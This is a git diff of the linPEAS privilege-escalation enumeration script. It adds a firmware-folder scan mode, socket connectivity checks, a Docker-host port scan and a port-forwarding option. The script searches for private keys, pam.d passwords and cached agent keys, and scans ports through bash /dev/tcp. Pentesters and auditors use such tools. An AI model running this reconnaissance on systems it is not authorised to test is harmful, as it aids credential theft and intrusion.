socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
|
||||||
@ -215,6 +238,7 @@ if ! [ "$IAMROOT" ]; then
|
|||||||
done
|
done
|
||||||
echo ""
|
echo ""
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
print_2title "Unix Sockets Listening"
|
print_2title "Unix Sockets Listening"
|
||||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
|
||||||
# Search sockets using netstat and ss
|
# Search sockets using netstat and ss
|
||||||
@ -225,9 +249,14 @@ if ! [ "$IAMROOT" ]; then
|
|||||||
if ! [ "$unix_scks_list" ];then
|
if ! [ "$unix_scks_list" ];then
|
||||||
unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
|
unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
|
||||||
fi
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
# But also search socket files
|
# But also search socket files
|
||||||
unix_scks_list2=$(find / -type s 2>/dev/null)
|
unix_scks_list2=$(find / -type s 2>/dev/null)
|
||||||
|
else
|
||||||
|
unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null)
|
||||||
|
fi
|
||||||
|
|
||||||
# Detele repeated dockets and check permissions
|
# Detele repeated dockets and check permissions
|
||||||
(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do
|
(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do
|
||||||
@ -238,10 +267,20 @@ if ! [ "$IAMROOT" ]; then
|
|||||||
if [ -w "$l" ];then
|
if [ -w "$l" ];then
|
||||||
perms="${perms}Write"
|
perms="${perms}Write"
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
if [ "$EXTRA_CHECKS" ] && [ "$(command -v curl)" ]; then
|
||||||
|
CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time 1 http:/linpeas 2>&1 | grep -i 'Permission denied')"
|
||||||
|
if ! [ "$CANNOT_CONNECT_TO_SOCKET" ]; then
|
||||||
|
perms="${perms} - Can Connect"
|
||||||
|
else
|
||||||
|
perms="${perms} - Cannot Connect"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
|
if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
|
||||||
else
|
else
|
||||||
echo "$l" | sed -${E} "s,$l,${SED_RED},g"
|
echo "$l" | sed -${E} "s,$l,${SED_RED},g"
|
||||||
echo " └─(${RED}${perms}${NC})"
|
echo " └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
|
||||||
# Try to contact the socket
|
# Try to contact the socket
|
||||||
socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
|
socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
|
||||||
if [ $? -eq 0 ]; then
|
if [ $? -eq 0 ]; then
|
||||||
@ -260,7 +299,7 @@ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-b
|
|||||||
if [ "$PSTORAGE_DBUS" ]; then
|
if [ "$PSTORAGE_DBUS" ]; then
|
||||||
printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
|
printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
|
||||||
for f in $d/*; do
|
for f in $d/*; do
|
||||||
if ! [ "$IAMROOT" ] && [ -w "$f" ]; then
|
if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
|
echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
|
||||||
fi
|
fi
|
||||||
|
|
||||||
@ -282,6 +321,7 @@ if [ "$PSTORAGE_DBUS" ]; then
|
|||||||
fi
|
fi
|
||||||
echo ""
|
echo ""
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
print_2title "D-Bus Service Objects list"
|
print_2title "D-Bus Service Objects list"
|
||||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
|
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
|
||||||
dbuslist=$(busctl list 2>/dev/null)
|
dbuslist=$(busctl list 2>/dev/null)
|
||||||
@ -298,3 +338,4 @@ if [ "$dbuslist" ]; then
|
|||||||
done
|
done
|
||||||
else echo_not_found "busctl"
|
else echo_not_found "busctl"
|
||||||
fi
|
fi
|
||||||
|
fi
|
||||||
|
@ -155,6 +155,10 @@ if [ "$AUTO_NETWORK_SCAN" ]; then
|
|||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
done
|
done
|
||||||
|
|
||||||
|
print_3title "Scanning top ports of host.docker.internal"
|
||||||
|
(tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
|
||||||
|
echo ""
|
||||||
fi
|
fi
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
@ -5,14 +5,14 @@
|
|||||||
NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so"
|
NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so"
|
||||||
|
|
||||||
#-- SI) Useful software
|
#-- SI) Useful software
|
||||||
if ! [ "SEARCH_IN_FOLDER" ]; then
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
print_2title "Useful software"
|
print_2title "Useful software"
|
||||||
for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done
|
for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
|
||||||
#-- SI) Search for compilers
|
#-- SI) Search for compilers
|
||||||
if ! [ "SEARCH_IN_FOLDER" ]; then
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
print_2title "Installed Compilers"
|
print_2title "Installed Compilers"
|
||||||
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/");
|
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/");
|
||||||
echo ""
|
echo ""
|
||||||
@ -221,12 +221,18 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
|
|||||||
hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
|
hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
|
||||||
hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
|
hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
|
||||||
writable_agents=$(find /tmp /etc /home -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)
|
writable_agents=$(find /tmp /etc /home -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)
|
||||||
|
else
|
||||||
|
sshconfig="$(ls ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null)"
|
||||||
|
hostsdenied="$(ls ${ROOT_FOLDER}etc/hosts.denied 2>/dev/null)"
|
||||||
|
hostsallow="$(ls ${ROOT_FOLDER}etc/hosts.allow 2>/dev/null)"
|
||||||
|
writable_agents=$(find ${ROOT_FOLDER} -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)
|
||||||
fi
|
fi
|
||||||
|
|
||||||
peass{SSH}
|
peass{SSH}
|
||||||
|
|
||||||
grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
|
grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
|
||||||
|
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
if [ "$TIMEOUT" ]; then
|
if [ "$TIMEOUT" ]; then
|
||||||
privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
|
privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
|
||||||
privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
|
privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
|
||||||
@ -236,6 +242,10 @@ else
|
|||||||
privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
|
privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
|
||||||
privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
|
privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
|
||||||
fi
|
fi
|
||||||
|
else
|
||||||
|
# If $SEARCH_IN_FOLDER lets just search for private keys in the whole firmware
|
||||||
|
privatekeyfilesetc=$(timeout 120 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' "$ROOT_FOLDER" 2>/dev/null)
|
||||||
|
fi
|
||||||
|
|
||||||
if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
|
if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
|
||||||
echo ""
|
echo ""
|
||||||
@ -267,7 +277,7 @@ if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then
|
|||||||
ssh-add -l
|
ssh-add -l
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
if gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"; then
|
if gpg-connect-agent "keyinfo --list" /bye 2>/dev/null | grep "D - - 1"; then
|
||||||
print_3title "Listing gpg keys cached in gpg-agent"
|
print_3title "Listing gpg keys cached in gpg-agent"
|
||||||
gpg-connect-agent "keyinfo --list" /bye
|
gpg-connect-agent "keyinfo --list" /bye
|
||||||
echo ""
|
echo ""
|
||||||
@ -284,29 +294,29 @@ fi
|
|||||||
if [ "$hostsdenied" ]; then
|
if [ "$hostsdenied" ]; then
|
||||||
print_3title "/etc/hosts.denied file found, read the rules:"
|
print_3title "/etc/hosts.denied file found, read the rules:"
|
||||||
printf "$hostsdenied\n"
|
printf "$hostsdenied\n"
|
||||||
cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
|
cat " ${ROOT_FOLDER}etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
if [ "$hostsallow" ]; then
|
if [ "$hostsallow" ]; then
|
||||||
print_3title "/etc/hosts.allow file found, trying to read the rules:"
|
print_3title "/etc/hosts.allow file found, trying to read the rules:"
|
||||||
printf "$hostsallow\n"
|
printf "$hostsallow\n"
|
||||||
cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
|
cat " ${ROOT_FOLDER}etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
if [ "$sshconfig" ]; then
|
if [ "$sshconfig" ]; then
|
||||||
echo ""
|
echo ""
|
||||||
echo "Searching inside /etc/ssh/ssh_config for interesting info"
|
echo "Searching inside /etc/ssh/ssh_config for interesting info"
|
||||||
grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
|
grep -v "^#" ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
|
||||||
fi
|
fi
|
||||||
echo ""
|
echo ""
|
||||||
|
|
||||||
peass{PAM Auth}
|
peass{PAM Auth}
|
||||||
|
|
||||||
#-- SI) Passwords inside pam.d
|
#-- SI) Passwords inside pam.d
|
||||||
pamdpass=$(grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#")
|
pamdpass=$(grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#")
|
||||||
if [ "$pamdpass" ] || [ "$DEBUG" ]; then
|
if [ "$pamdpass" ] || [ "$DEBUG" ]; then
|
||||||
print_2title "Passwords inside pam.d"
|
print_2title "Passwords inside pam.d"
|
||||||
grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
|
grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
|
||||||
@ -558,6 +568,7 @@ peass{Cache Vi}
|
|||||||
peass{Wget}
|
peass{Wget}
|
||||||
|
|
||||||
##-- SI) containerd installed
|
##-- SI) containerd installed
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
containerd=$(command -v ctr)
|
containerd=$(command -v ctr)
|
||||||
if [ "$containerd" ] || [ "$DEBUG" ]; then
|
if [ "$containerd" ] || [ "$DEBUG" ]; then
|
||||||
print_2title "Checking if containerd(ctr) is available"
|
print_2title "Checking if containerd(ctr) is available"
|
||||||
@ -568,8 +579,10 @@ if [ "$containerd" ] || [ "$DEBUG" ]; then
|
|||||||
fi
|
fi
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
##-- SI) runc installed
|
##-- SI) runc installed
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
runc=$(command -v runc)
|
runc=$(command -v runc)
|
||||||
if [ "$runc" ] || [ "$DEBUG" ]; then
|
if [ "$runc" ] || [ "$DEBUG" ]; then
|
||||||
print_2title "Checking if runc is available"
|
print_2title "Checking if runc is available"
|
||||||
@ -579,6 +592,7 @@ if [ "$runc" ] || [ "$DEBUG" ]; then
|
|||||||
fi
|
fi
|
||||||
echo ""
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
#-- SI) Docker
|
#-- SI) Docker
|
||||||
if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then
|
if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then
|
||||||
|
@ -279,14 +279,25 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
|
|||||||
fi
|
fi
|
||||||
fi
|
fi
|
||||||
|
|
||||||
##-- IF) Executable files added by user
|
##-- IF) Date times inside firmware
|
||||||
print_2title "Executable files added by user (limit 70)"
|
if [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
print_2title "FIles datetimes inside the firmware (limit 50)"
|
||||||
find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort | tail -n 70
|
find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50
|
||||||
else
|
echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"<date>\""
|
||||||
find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort | tail -n 70
|
echo ""
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
##-- IF) Executable files added by user
|
||||||
|
print_2title "Executable files potentially added by user (limit 70)"
|
||||||
|
if ! [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
|
find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70
|
||||||
|
else
|
||||||
|
find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70
|
||||||
|
fi
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
if [ "$MACPEAS" ]; then
|
if [ "$MACPEAS" ]; then
|
||||||
print_2title "Unsigned Applications"
|
print_2title "Unsigned Applications"
|
||||||
macosNotSigned /System/Applications
|
macosNotSigned /System/Applications
|
||||||
@ -454,7 +465,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
|
|||||||
|
|
||||||
##-- IF) Mail applications
|
##-- IF) Mail applications
|
||||||
print_2title "Searching installed mail applications"
|
print_2title "Searching installed mail applications"
|
||||||
ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps"
|
ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq
|
||||||
echo ""
|
echo ""
|
||||||
|
|
||||||
##-- IF) Mails
|
##-- IF) Mails
|
||||||
|
@ -65,6 +65,7 @@ DEBUG=""
|
|||||||
AUTO_NETWORK_SCAN=""
|
AUTO_NETWORK_SCAN=""
|
||||||
EXTRA_CHECKS=""
|
EXTRA_CHECKS=""
|
||||||
REGEXES=""
|
REGEXES=""
|
||||||
|
PORT_FORWARD=""
|
||||||
THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")"
|
THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")"
|
||||||
[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2
|
[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2
|
||||||
[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2
|
[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2
|
||||||
@ -87,6 +88,9 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user,
|
|||||||
${YELLOW} -i <IP> [-p <PORT(s)>]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
|
${YELLOW} -i <IP> [-p <PORT(s)>]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
|
||||||
$GREEN Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
|
$GREEN Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
|
||||||
|
|
||||||
|
${GREEN} Port forwarding:
|
||||||
|
${YELLOW} -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a port from a local IP to a remote IP
|
||||||
|
|
||||||
${GREEN} Firmware recon:
|
${GREEN} Firmware recon:
|
||||||
${YELLOW} -f </FOLDER/PATH>${BLUE} Execute linpeas to search passwords/file permissions misconfigs inside a folder
|
${YELLOW} -f </FOLDER/PATH>${BLUE} Execute linpeas to search passwords/file permissions misconfigs inside a folder
|
||||||
|
|
||||||
@ -98,7 +102,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user,
|
|||||||
${YELLOW} -q${BLUE} Do not show banner
|
${YELLOW} -q${BLUE} Do not show banner
|
||||||
${YELLOW} -N${BLUE} Do not use colours$NC"
|
${YELLOW} -N${BLUE} Do not use colours$NC"
|
||||||
|
|
||||||
while getopts "h?asd:p:i:P:qo:LMwNDterf:" opt; do
|
while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do
|
||||||
case "$opt" in
|
case "$opt" in
|
||||||
h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;;
|
h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;;
|
||||||
a) FAST="";EXTRA_CHECKS="1";;
|
a) FAST="";EXTRA_CHECKS="1";;
|
||||||
@ -117,7 +121,15 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:" opt; do
|
|||||||
t) AUTO_NETWORK_SCAN="1";;
|
t) AUTO_NETWORK_SCAN="1";;
|
||||||
e) EXTRA_CHECKS="1";;
|
e) EXTRA_CHECKS="1";;
|
||||||
r) REGEXES="1";;
|
r) REGEXES="1";;
|
||||||
f) SEARCH_IN_FOLDER=$OPTARG; ROOT_FOLDER=$OPTARG; REGEXES="1"; CHECKS="software_information,interesting_files,api_keys_regex";;
|
f) SEARCH_IN_FOLDER=$OPTARG;
|
||||||
|
if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/"
|
||||||
|
SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/";
|
||||||
|
fi;
|
||||||
|
ROOT_FOLDER=$SEARCH_IN_FOLDER;
|
||||||
|
REGEXES="1";
|
||||||
|
CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_files,api_keys_regex";;
|
||||||
|
|
||||||
|
F) PORT_FORWARD=$OPTARG;;
|
||||||
esac
|
esac
|
||||||
done
|
done
|
||||||
|
|
||||||
@ -510,11 +522,11 @@ TIMEOUT="$(command -v timeout 2>/dev/null)"
|
|||||||
STRACE="$(command -v strace 2>/dev/null)"
|
STRACE="$(command -v strace 2>/dev/null)"
|
||||||
STRINGS="$(command -v strings 2>/dev/null)"
|
STRINGS="$(command -v strings 2>/dev/null)"
|
||||||
|
|
||||||
shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
|
shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
|
||||||
|
|
||||||
notBackup="/tdbbackup$|/db_hotbackup$"
|
notBackup="/tdbbackup$|/db_hotbackup$"
|
||||||
|
|
||||||
cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart|"
|
cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-motd|update-notifier-common|upstart|"
|
||||||
cronjobsB="centreon"
|
cronjobsB="centreon"
|
||||||
|
|
||||||
processesVB='jdwp|tmux |screen | inspect |--inspect[= ]|--inspect$|--inpect-brk|--remote-debugging-port'
|
processesVB='jdwp|tmux |screen | inspect |--inspect[= ]|--inspect$|--inpect-brk|--remote-debugging-port'
|
||||||
@ -577,7 +589,7 @@ elif [ -f "/bin/bash" ] && ! [ -L "/bin/bash" ]; then
|
|||||||
FOUND_BASH="/bin/bash";
|
FOUND_BASH="/bin/bash";
|
||||||
fi
|
fi
|
||||||
if [ "$FOUND_BASH" ]; then
|
if [ "$FOUND_BASH" ]; then
|
||||||
SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is available for network discovery & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)\n"
|
SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is available for network discovery, port scanning and port forwarding$LG ($SCRIPTNAME can discover hosts, scan ports, and forward ports. Learn more with -h)\n"
|
||||||
fi
|
fi
|
||||||
|
|
||||||
FOUND_NC=$(command -v nc 2>/dev/null)
|
FOUND_NC=$(command -v nc 2>/dev/null)
|
||||||
@ -826,8 +838,8 @@ tcp_recon (){
|
|||||||
for port in $PORTS; do
|
for port in $PORTS; do
|
||||||
for j in $(seq 1 254)
|
for j in $(seq 1 254)
|
||||||
do
|
do
|
||||||
if [ "$FOUND_BASH" ] && [ "$$TIMEOUT" ]; then
|
if [ "$FOUND_BASH" ] && [ "$TIMEOUT" ]; then
|
||||||
$TIMEOUT 5 $FOUND_BASH -c "(echo </dev/tcp/$IP3.$j/$port) 2>/dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$port\"" &
|
$TIMEOUT 2.5 $FOUND_BASH -c "(echo </dev/tcp/$IP3.$j/$port) 2>/dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$port\"" &
|
||||||
elif [ "$NC_SCAN" ]; then
|
elif [ "$NC_SCAN" ]; then
|
||||||
($NC_SCAN "$IP3"."$j" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") &
|
